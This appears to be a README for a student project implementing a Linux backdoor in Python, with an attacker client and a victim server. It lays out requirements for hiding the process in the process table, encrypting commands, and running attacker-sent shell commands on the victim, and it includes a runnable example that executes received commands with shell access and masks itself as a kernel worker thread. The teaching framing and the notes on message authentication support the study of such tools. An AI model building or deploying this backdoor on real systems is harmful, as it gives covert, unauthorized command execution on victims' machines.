Linux backdoor implementation written in Python.

A backdoor is usually regarded as a vulnerability, since it lets an attacker reach a victim’s machine without valid credentials. It is more than an exploitation tool, though: in general a backdoor is an access path that the programmer deliberately builds into a program. That is unquestionably a security flaw, but the same mechanism is also used for debugging and analysis.
This assignment demonstrates a backdoor program in which the attacker executes shell commands on the victim’s machine and receives the output back.

Requirements
+ Backdoor must camouflage itself so as to deceive anyone looking at the process table.
+ The application must authenticate incoming packets so that it only acts on those meant for the backdoor itself.
+ The backdoor must interpret commands sent to it, execute them and send the results back.
+ Incorporate an encryption scheme of your choice into the backdoor.

Implementation
The program is written in Python. Two programs are included in this assignment:
1. client.py (Attacker)
2. server.py (Backdoor Victim)
The client (attacker) establishes a connection to the server (victim) and can then execute Linux commands on the victim’s machine. Each command is AES-encrypted before it is sent to the server. The victim’s reply is AES-encrypted as well, so the client decrypts it back to plaintext before displaying it.

The server (victim) receives the encrypted data, decrypts it and executes the command. The command is not displayed on the victim’s side, to emulate a hidden backdoor. The server then encrypts the command output, again with AES, and transmits it back to the client.
The program uses two libraries:
1. pycrypto 2.6.1 – For Encryption (PyCrypto is no longer maintained; PyCryptodome is the usual drop-in replacement and exposes the same Crypto.Cipher.AES API)
2. setproctitle 1.1.8 – To masquerade process title
Note that the attacking machine also authenticates packets: the secret key used for encryption doubles as a flag, and any traffic that does not carry it is ignored. Encryption on its own does not provide message authentication, however; modified or injected ciphertext is only detected if a MAC is checked or an AEAD mode such as AES-GCM is used, so treat this flag check as a traffic filter rather than real authentication.
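The following is an added example, not the repository’s client.py or server.py. It walks through the exchange described above with both ends in one process (no sockets) so it can be run directly: the attacker seals a command, the victim verifies and decrypts it, executes it only after the check passes, and seals the output for the trip back. The standard library has no AES, so an HMAC-SHA256 counter-mode keystream stands in for the AES cipher the project uses; the structure is what matters, not the cipher. It also shows what the “key as flag” check above should become: an HMAC tag verified in constant time, so junk and tampered packets are dropped before anything is decrypted or executed. KEY, the wire format, all function names and the `[kworker/0:1]` process title are assumptions of this example.

```python
import hashlib
import hmac
import os
import struct
import subprocess
from typing import Optional

# Constructed demo key for this example; a real deployment provisions the
# shared secret out of band. This is NOT a key from the repository.
KEY = b"demo-shared-secret-for-the-example"
NONCE_LEN = 16   # random per-message nonce
TAG_LEN = 32     # HMAC-SHA256 tag


def _keystream(key: bytes, nonce: bytes, length: int) -> bytes:
    """PRF in counter mode: concatenated HMAC-SHA256(key, nonce || counter) blocks.
    Stands in for AES-CTR here only because the stdlib has no AES."""
    out = bytearray()
    counter = 0
    while len(out) < length:
        out += hmac.new(key, nonce + struct.pack(">Q", counter), hashlib.sha256).digest()
        counter += 1
    return bytes(out[:length])


def seal(key: bytes, plaintext: bytes, nonce: Optional[bytes] = None) -> bytes:
    """Encrypt-then-MAC. Wire format (assumed): nonce || ciphertext || tag."""
    nonce = os.urandom(NONCE_LEN) if nonce is None else nonce
    ks = _keystream(key, nonce, len(plaintext))
    ciphertext = bytes(p ^ k for p, k in zip(plaintext, ks))
    body = nonce + ciphertext
    tag = hmac.new(key, body, hashlib.sha256).digest()
    return body + tag


def unseal(key: bytes, blob: bytes) -> Optional[bytes]:
    """Verify the tag before touching the ciphertext; None means 'ignore this packet'."""
    if len(blob) < NONCE_LEN + TAG_LEN:
        return None
    body, tag = blob[:-TAG_LEN], blob[-TAG_LEN:]
    expected = hmac.new(key, body, hashlib.sha256).digest()
    if not hmac.compare_digest(tag, expected):   # constant-time comparison
        return None
    nonce, ciphertext = body[:NONCE_LEN], body[NONCE_LEN:]
    ks = _keystream(key, nonce, len(ciphertext))
    return bytes(c ^ k for c, k in zip(ciphertext, ks))


def client_build_request(key: bytes, command: str) -> bytes:
    """Attacker side: seal the shell command for the wire."""
    return seal(key, command.encode())


def server_handle(key: bytes, blob: bytes) -> Optional[bytes]:
    """Victim side: authenticate and decrypt; only then run the command.
    Returns the sealed output, or None for packets not meant for the backdoor."""
    command = unseal(key, blob)
    if command is None:
        return None
    result = subprocess.run(command.decode(errors="replace"), shell=True,
                            capture_output=True)
    return seal(key, result.stdout + result.stderr)


def client_read_response(key: bytes, blob: bytes) -> Optional[str]:
    """Attacker side: unseal the victim's reply back to plaintext."""
    output = unseal(key, blob)
    return None if output is None else output.decode(errors="replace")


def run_command(key: bytes, command: str) -> Optional[str]:
    """The full exchange with both ends in one process (no sockets) for the example."""
    response = server_handle(key, client_build_request(key, command))
    return None if response is None else client_read_response(key, response)


def disguise_process(title: str) -> bool:
    """Process-table camouflage with the setproctitle library the page names;
    returns False if it is not installed. The title is the caller's choice."""
    try:
        import setproctitle
    except ImportError:
        return False
    setproctitle.setproctitle(title)
    return True


if __name__ == "__main__":
    disguise_process("[kworker/0:1]")            # assumed title; whatever `ps` should show
    print(run_command(KEY, "id; uname -r"))
    # Junk and tampered packets are dropped before anything is executed.
    tampered = bytearray(client_build_request(KEY, "touch /tmp/pwned"))
    tampered[NONCE_LEN] ^= 0x01                  # flip one ciphertext bit
    print(server_handle(KEY, bytes(tampered)))   # None
```

The order inside `unseal` is the point: the tag covers nonce and ciphertext and is checked with `hmac.compare_digest` before any decryption, so a packet from anyone who does not hold the key never reaches `subprocess.run`. Swapping `_keystream` for AES-CTR from PyCryptodome (or the whole seal/unseal pair for AES-GCM) keeps the same shape.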

Note: Both programs require the pycrypto library to be installed. Additionally, the server requires the setproctitle library.
You may download the libraries from the links below:
https://pypi.python.org/packages/source/p/pycrypto/pycrypto-2.6.1.tar.gz
https://pypi.python.org/packages/source/s/setproctitle/setproctitle-1.1.8.tar.gz#md5=728f4c8c6031bbe56083a48594027edd

Client :

Backdoor-Client (Attacker Diagram)

Server :

Backdoor-Server (Victim Diagram)

Usage :

Source : https://github.com/jeffreysasaki